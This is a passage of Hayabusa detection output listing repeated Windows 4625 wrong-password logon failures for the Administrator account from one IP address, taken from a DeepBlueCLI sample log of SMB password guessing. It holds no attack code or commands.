NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uKLrHVMevqniTck8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ldxglvKFhLJQ3FV3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.685 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lRHIAxIj9wFRIg67 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.725 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mc7nvfyDfWpnhhBx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NB7Y4gPbxose5TsQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.806 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yKFU6DJ8Wdtp2qdC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YlbxRctdClWIOjss : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.886 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LToi5ANf3tUteu4h : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.932 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 52YPmYviVPBqJ39Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.985 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JpzKsyxEKNLd8l1u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r0vd6xEFevamX3jF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.089 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WR9gJBoN1ra4NI2M : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rGYNVrDBIpMBu9GT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.186 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 57qCysbeaXx12CbY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.229 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xyJl4mHvgtTv53d9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.275 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jGBDZCtot2ogcKIO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.305 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bBhmbqZIi1gX62mM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o7d4bcBJV1jlRgdt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FtfFb6hMHJiFXxai : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.441 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: frlsZMDcdb5WaW99 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CFV8UiUTRCCfab9l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.537 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZI8P6ZeVRmQlbGtz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.572 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UmJI7S1nj5hfWZqv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: veh8XInSzXe8E9UD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.669 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a1BuBHLILZ4afwJC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.721 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NN2h7CHnGSCQZXan : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.758 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BU3fxfM1qGBJ55HS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.802 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q1OlBmhUABabDQbN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6DgQtHG7cT05kRXd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.890 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EUTe3JqVWgDcDcOS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nGKgUOyX3USQlESB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.978 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rcIJ8keQvgax1SuL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.025 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: A7jsyA7bWtVf4sLr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.065 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mijnM28fwbgWzkvp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.115 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o6dNmJo7vkacqxA6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.155 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FxvD2OWtadDT1Q2c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.185 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WK8Esc50KVWIsLU5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.244 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U07NeCzXSdx5Nlgs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tObVl72GJse2HCGp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.335 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nbEnp2E5a3N78OBC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IlRmyinJLWwj5yQg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.438 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 92H7tdXinUOxtOLV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.493 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Za42EUNuitIXaMBo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kz7OtswOreS0fdeS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VMxY1IHx5VuvskM7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.667 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: d6uxMqLCcqHkuesV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.721 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TmeAWYvFEbqJp1rt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.826 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8tGAdT1CBRYRatVA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:34.925 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: K0h9ulMPWtj8bEKI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eLyLMNv6cOp3sgrq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.098 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KIAOs16X8nFxV45x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.150 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z4EbyEaUxUEyuiY6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SDnW5GABBLbe6eZ7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.258 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GublgQLD3RXQNmkX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.301 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2BQRppHTUHAoWPe4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gnh6HFlIW1zWEBu5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.402 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ulbcy5PWLYUm5Sy0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.449 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L8rkZ7iBMam5o8VJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.493 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n39Zox0PFeNirzyT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.543 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3u3YUCKxEo5pnKJX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.589 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wen3pHM88kSRkHNf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dGDHJ4KMm2zEMV0b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.673 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lKZAB1nfXPYSLxsE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tYkOsX0XDpkdvp01 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.779 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r9y7HjOeGPcrdj1c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.823 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RLwh8Lg3nvbm8Q2p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.874 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QoMkBcp8ouIgpX4m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2UnrDiOAOec5DQGQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UxJGLShj5EDKLSDZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.033 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iWhaz8W0VLQdXKWN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 82YDxSIBnCAqdK4c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 795b7XqsxokIGJyM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.172 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1BmnyTsmP2XqMzf1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.221 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NB3xsYe3RcPXhDib : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.264 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yxN9i8exdO2h4oa7 : IP Address: 192.168.198.149 : AuthPackage: 